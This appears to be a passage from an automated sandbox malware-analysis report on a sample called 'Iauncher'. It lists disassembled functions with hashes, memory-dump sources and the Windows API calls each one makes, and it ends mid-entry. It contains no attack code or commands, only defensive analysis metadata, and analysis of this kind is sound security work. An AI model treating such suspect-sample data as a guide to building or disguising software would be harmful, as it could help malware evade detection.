                                                                                                                                                    • Instruction ID: d61f8d7f7a4ba9985220190b8ed45eaa696b7ed4d8372267b4da7986375aa8ef
                                                                                                                                                    • Opcode Fuzzy Hash: c601245b380f2fa4e2575c7b07c74cfb1fdab0009310bb0d8fdefd6db07ee908
                                                                                                                                                    • Instruction Fuzzy Hash: F0719E74A01208AFCB15DFA9D884DAEBBB6FF49714F114499F901AB361DB31EC82CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075EC428 Relevance: 1.6, APIs: 1, Instructions: 98windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Focus
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2734777837-0
                                                                                                                                                    • Opcode ID: d6183e301a455574beb2404a13effa13d05449fb76f8ba47974bfd93438bc503
                                                                                                                                                    • Instruction ID: bf2ef3b2aa322359e4028ed5317cd435a3e5ca2481bf460d805c919e35c89970
                                                                                                                                                    • Opcode Fuzzy Hash: d6183e301a455574beb2404a13effa13d05449fb76f8ba47974bfd93438bc503
                                                                                                                                                    • Instruction Fuzzy Hash: A1317AB1E002168FDB18EF69D444AFEBBB9BF48611F15445AD815EB355DB34EC01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 010173AC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01017469
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: bf6dc7c5dc47d3a0e881959e75ea3dc84fd5efafc6721c49340185221b8fef51
                                                                                                                                                    • Instruction ID: ba9447b118c95c6f5f5417b9894b81f0adfcfda7ebbde1cd0e01013c589a0c96
                                                                                                                                                    • Opcode Fuzzy Hash: bf6dc7c5dc47d3a0e881959e75ea3dc84fd5efafc6721c49340185221b8fef51
                                                                                                                                                    • Instruction Fuzzy Hash: CC410271C00719CBEB24DFA9C844BDDBBF1BF88304F20816AD448AB295DB755946CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01015E24 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01017469
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 0161f7c77dbd1677a06d753b0008c2a65ff66c9d39e09ac1f5f1d5279bbbba53
                                                                                                                                                    • Instruction ID: 98347374e063b1c7072dd2d6e1817d5f00855763859e9e650d4b685d8ba08d8f
                                                                                                                                                    • Opcode Fuzzy Hash: 0161f7c77dbd1677a06d753b0008c2a65ff66c9d39e09ac1f5f1d5279bbbba53
                                                                                                                                                    • Instruction Fuzzy Hash: FE41E471C0071DCBEB24DFA9C844B9EBBF5BF48304F20816AD508AB255DB756946CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DBB560 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    • Opcode ID: b7fa2d832575b044f8e38354fb931d78b39dff0aba1670943cbe63a1f393b697
                                                                                                                                                    • Instruction ID: 9a7ca8ad365ab94b3c63244b5eae32b771c349d5b205728ce2fd3c48370b475f
                                                                                                                                                    • Opcode Fuzzy Hash: b7fa2d832575b044f8e38354fb931d78b39dff0aba1670943cbe63a1f393b697
                                                                                                                                                    • Instruction Fuzzy Hash: 7231A7729003899FDB11DFA9C840AEEBFF9EF09320F14805AE954EB221C3359951CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075ED8A3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,075EF6E7,00000000,03A1411C,02A5D8EC,00000000,?), ref: 075EFD75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: a6833775a9e7c69cf0ce64919b6f357f532d16954a10eba4529742d647e49c22
                                                                                                                                                    • Instruction ID: 76e5e8c06c6176dc1cd70a92db169a5a774d4fad0a046aece9b652106d739e3b
                                                                                                                                                    • Opcode Fuzzy Hash: a6833775a9e7c69cf0ce64919b6f357f532d16954a10eba4529742d647e49c22
                                                                                                                                                    • Instruction Fuzzy Hash: 7F31EEB2C043898FDB10DFA9D981BEEBFF8FB49320F04846AD050A7251C3749509CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075EC418 Relevance: 1.6, APIs: 1, Instructions: 74windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Focus
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2734777837-0
                                                                                                                                                    • Opcode ID: 57bcb65023ed45aedb066953d1f82f12a6f5dd76fe1903dff2dee5182ffe391b
                                                                                                                                                    • Instruction ID: 19441e8209a41f06553334ea3cc95f658d2ddfb3526375ae6a1aca6be6e1c3c0
                                                                                                                                                    • Opcode Fuzzy Hash: 57bcb65023ed45aedb066953d1f82f12a6f5dd76fe1903dff2dee5182ffe391b
                                                                                                                                                    • Instruction Fuzzy Hash: AB2168B5E0035A8FCB14DF65D444BEEBBB9FB09621F1485AAD818A7301C735A840CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D8AB81 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05D8AC1F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684118323.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d80000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DrawText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2175133113-0
                                                                                                                                                    • Opcode ID: 1e6f8d10307c5e82185a2c8359f96dbecd46013456a649382f239a326b9f5b07
                                                                                                                                                    • Instruction ID: eeac4c6be485f55f5685046772a876a66ae2293d89f88caea7f61419370841bb
                                                                                                                                                    • Opcode Fuzzy Hash: 1e6f8d10307c5e82185a2c8359f96dbecd46013456a649382f239a326b9f5b07
                                                                                                                                                    • Instruction Fuzzy Hash: 2331C5B5D003099FDB10DF9AD884A9EFBF5FB48320F54842AE915A7310D775A945CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB11D3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 05DB126A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: TextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 530164218-0
                                                                                                                                                    • Opcode ID: 4b5bc938ad37e49af47899e68d04f896a46fa4cf7fcf550e54177dc0c6aa9291
                                                                                                                                                    • Instruction ID: 0f3b3f3d1639454c06df2dfb782486d4087aa8f547e0ec2c09e603b7c7a73d98
                                                                                                                                                    • Opcode Fuzzy Hash: 4b5bc938ad37e49af47899e68d04f896a46fa4cf7fcf550e54177dc0c6aa9291
                                                                                                                                                    • Instruction Fuzzy Hash: DD2195B28003498FDB10CFAAC845BDEBFF4EB49320F14C46AD464A3241C738A506CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D8AB88 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05D8AC1F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684118323.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d80000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DrawText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2175133113-0
                                                                                                                                                    • Opcode ID: c8d54125b7d211347bef8ec024ba7937d4bcddf8a5e98a2204e59c08796f931c
                                                                                                                                                    • Instruction ID: 253d7141cbb4a9c2b077f18b5b4582a2adc11f4113a9483424d8a137fd08cca5
                                                                                                                                                    • Opcode Fuzzy Hash: c8d54125b7d211347bef8ec024ba7937d4bcddf8a5e98a2204e59c08796f931c
                                                                                                                                                    • Instruction Fuzzy Hash: 7521B4B5D003499FDB10DF9AD884AAEFBF5FB48320F14842AE919A7310D775A945CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DBC3E0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 05DBC46F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FromMonitorPoint
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1566494148-0
                                                                                                                                                    • Opcode ID: b1eaebc2a6628cc11cb27111c75ede656b554d1f0c3ee004d568574bc55a1766
                                                                                                                                                    • Instruction ID: 9f1e8a4119674cce5711c859bbf8b4b7fbb595c06e28d73ecd1898e4f34e7cdb
                                                                                                                                                    • Opcode Fuzzy Hash: b1eaebc2a6628cc11cb27111c75ede656b554d1f0c3ee004d568574bc55a1766
                                                                                                                                                    • Instruction Fuzzy Hash: 5F217C75A0424A9FDB20DF99C445BEEBBF5FB48320F10801AE855A7391D774A904CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB12DB Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 05DB135C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassInfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3534257612-0
                                                                                                                                                    • Opcode ID: 2048535ac669cb4e6fc51443761c6f9640ec088bfc8c68e43694bad407dea131
                                                                                                                                                    • Instruction ID: cfa7361c4392ef8a8108031b76e730f38ab8079c91826bfed62b9636f170da8c
                                                                                                                                                    • Opcode Fuzzy Hash: 2048535ac669cb4e6fc51443761c6f9640ec088bfc8c68e43694bad407dea131
                                                                                                                                                    • Instruction Fuzzy Hash: 0C21E4B1D016499FDB10DF9AD885ADEFBF9FB48310F14812AE419A3740D378A944CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0101FA88 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0101FB0F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: ed724dfeb3c846bb1bf9869c42062202e530b2b3f87421ee23453331269978e6
                                                                                                                                                    • Instruction ID: 03e05b25cce68b46e3eec1fde25c34b9e1f5a8aabbab9ca4f80aa5cb1c247b90
                                                                                                                                                    • Opcode Fuzzy Hash: ed724dfeb3c846bb1bf9869c42062202e530b2b3f87421ee23453331269978e6
                                                                                                                                                    • Instruction Fuzzy Hash: DA21E4B5D002499FDB10CF9AD885ADEBFF8FB48320F14841AE954A3350D378A944CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB12E0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 05DB135C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassInfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3534257612-0
                                                                                                                                                    • Opcode ID: de46394bd99826062a41c6f34e8ac16187592b42f35fa6e7649428d0803eb1cd
                                                                                                                                                    • Instruction ID: 3730cb837de96e29216e3f991698e7d91dbb5eee0ec64ecddec9fd2f573e4841
                                                                                                                                                    • Opcode Fuzzy Hash: de46394bd99826062a41c6f34e8ac16187592b42f35fa6e7649428d0803eb1cd
                                                                                                                                                    • Instruction Fuzzy Hash: 0821F3B1D017098FDB10DF9AD884ADEFBF5FB48320F14812AD419A3740D378A904CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DBA568 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05DBB57A,?,?,?,?,?), ref: 05DBB61F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    • Opcode ID: d00481569a454afdfdf72c1b0c1b50f2703625607986fd10eb079bb2f84f783e
                                                                                                                                                    • Instruction ID: 3c7a6faecc2fb1b210f6ff31ffa372ecd6f0a9db3334e70f3567fe90044c2dfa
                                                                                                                                                    • Opcode Fuzzy Hash: d00481569a454afdfdf72c1b0c1b50f2703625607986fd10eb079bb2f84f783e
                                                                                                                                                    • Instruction Fuzzy Hash: 021117758003499FEB20DF9AC845BDEBFF9EB48320F14841AE955A7250C375A950CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075ED834 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,075EF65A,00000000,00000000,03A1411C,02A5D8EC), ref: 075EFAA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePeek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2222842502-0
                                                                                                                                                    • Opcode ID: 41e2987f2df5b853a9c87b3f3d3bcb9d3f9dff1843556227766b9ef99882287b
                                                                                                                                                    • Instruction ID: a37a9479eef533ae0da5d6fe51dc634870a47a643f3facdaf794a38a86be2f0a
                                                                                                                                                    • Opcode Fuzzy Hash: 41e2987f2df5b853a9c87b3f3d3bcb9d3f9dff1843556227766b9ef99882287b
                                                                                                                                                    • Instruction Fuzzy Hash: 0D1117B5C002499FDB10DF9AC444BDEBBF8FB48320F10842AE914A7250C778A944CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0101CFC8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0101D881,00000800,00000000,00000000), ref: 0101DA92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 964215d1322549cea74a4c55c0eccf8c1f8e621668c9cf7a834076b08e46eba7
                                                                                                                                                    • Instruction ID: 909d95cb1e2e7cb1bf84687e8f38dea843fa04adff80500349f4e6e6be71965c
                                                                                                                                                    • Opcode Fuzzy Hash: 964215d1322549cea74a4c55c0eccf8c1f8e621668c9cf7a834076b08e46eba7
                                                                                                                                                    • Instruction Fuzzy Hash: 8E1103B6D043498FDB24DF9AC448A9EFBF4EB48310F50842AE559A7200C379A945CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075EA7E8 Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 075EA845
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Initialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                    • Opcode ID: 4affe88b8b50613bad70205b6e63cbb0f94ff3c805141fa6c6328a71ed3685cd
                                                                                                                                                    • Instruction ID: b316ace5bf650d876861b9441679ace2f5fd8fe2996885db1210ed51b1d62bcd
                                                                                                                                                    • Opcode Fuzzy Hash: 4affe88b8b50613bad70205b6e63cbb0f94ff3c805141fa6c6328a71ed3685cd
                                                                                                                                                    • Instruction Fuzzy Hash: 1A1188B5C003898FDB20DFA9D485BDEBFF8EB48320F14845AD558A7640C339A941CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075EFD08 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,075EF6E7,00000000,03A1411C,02A5D8EC,00000000,?), ref: 075EFD75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: a1f548e4c1a29ab6bf1c3c71e2e6564b8715fc45abf037f01e8614e7d069fc4a
                                                                                                                                                    • Instruction ID: 798f734695674f69a0726ac9ba1a15f644a03e50e3e51cf68c438c9cc38b8e70
                                                                                                                                                    • Opcode Fuzzy Hash: a1f548e4c1a29ab6bf1c3c71e2e6564b8715fc45abf037f01e8614e7d069fc4a
                                                                                                                                                    • Instruction Fuzzy Hash: 001114B69002499FDB10DF9AD984BEEFBF4EB48320F10842EE418A3650C379A545CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075ED84C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,075EF6E7,00000000,03A1411C,02A5D8EC,00000000,?), ref: 075EFD75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: de4e8ba8ab68a63fb6db34bad8a3bee851fc889a6879abd4f8c997fdf2d2ded9
                                                                                                                                                    • Instruction ID: de1ea3a37883e9cfc9fa7ac9fd2eba3640864ccd0076590ce90652033788f43d
                                                                                                                                                    • Opcode Fuzzy Hash: de4e8ba8ab68a63fb6db34bad8a3bee851fc889a6879abd4f8c997fdf2d2ded9
                                                                                                                                                    • Instruction Fuzzy Hash: 4911E4B58003499FDB50DF9AD945BEEBBF8FB48320F10842AE554A3241C778A945CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB1200 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 05DB126A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: TextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 530164218-0
                                                                                                                                                    • Opcode ID: ddb883962f3debafacff6b17dab6ff4813937b47a4a6e2ed75376e936692a0af
                                                                                                                                                    • Instruction ID: 4b94a0283f25553f91507d9e4784fc32d3f71890bde706fb04832f0d2f16caef
                                                                                                                                                    • Opcode Fuzzy Hash: ddb883962f3debafacff6b17dab6ff4813937b47a4a6e2ed75376e936692a0af
                                                                                                                                                    • Instruction Fuzzy Hash: 161123B6C002498FDB14DF9AC845BDEFBF5EF88320F10842AD869A3240D378A545CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075EFA3F Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,075EF65A,00000000,00000000,03A1411C,02A5D8EC), ref: 075EFAA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePeek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2222842502-0
                                                                                                                                                    • Opcode ID: ec35835f3e0f2d9592d6f4c652c615e57f85ac1c9a9b89aa51b10a7f1b376bf3
                                                                                                                                                    • Instruction ID: a3f8b12aabe31501142bb6e298513e85317ac9e7520bc38e1135c6ab943ee08a
                                                                                                                                                    • Opcode Fuzzy Hash: ec35835f3e0f2d9592d6f4c652c615e57f85ac1c9a9b89aa51b10a7f1b376bf3
                                                                                                                                                    • Instruction Fuzzy Hash: 6111F3B6C00249DFDB10DF9AD985BDEBBF8FB08320F10842AE918A7250C378A545CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075E9DC2 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 075E9E25
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: a03e31e8280607e652b2bdad3222cfb0e9eea319ff2df64692ad41277780a209
